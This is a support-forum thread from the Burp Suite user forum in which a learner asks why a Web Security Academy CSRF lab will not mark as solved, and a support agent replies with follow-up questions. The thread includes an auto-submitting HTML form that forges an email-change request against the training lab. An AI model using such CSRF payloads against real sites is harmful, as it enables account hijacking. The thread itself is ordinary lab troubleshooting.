Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

problem

mohamed | Last updated: Aug 01, 2024 12:56PM UTC

when i exploit csrf it show not solved and i use chrome and burp pro , my exploit <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0aab002f0476a3718084260100480067.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="attacker4444&#64;gmail&#46;com" /> <input type="hidden" name="csrf" value="O87vKfrHua9LZZmvjFKlNS72yMvoQfHU" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

Michelle, PortSwigger Agent | Last updated: Aug 02, 2024 08:31AM UTC

Hi Can you confirm which lab you are working on? If you change the email address value to use an @, does that change the behavior at all? Are you able to successfully test the exploit on yourself?

mohamed | Last updated: Aug 04, 2024 12:00PM UTC

first and second in csrf , yes , yes

Michelle, PortSwigger Agent | Last updated: Aug 05, 2024 07:59AM UTC

When you changed the email address value to use an @, how did that change the behavior? Are you still having issues with the lab?

mohamed | Last updated: Aug 05, 2024 10:44AM UTC

email change but not appear i solve the lab

Michelle, PortSwigger Agent | Last updated: Aug 05, 2024 12:06PM UTC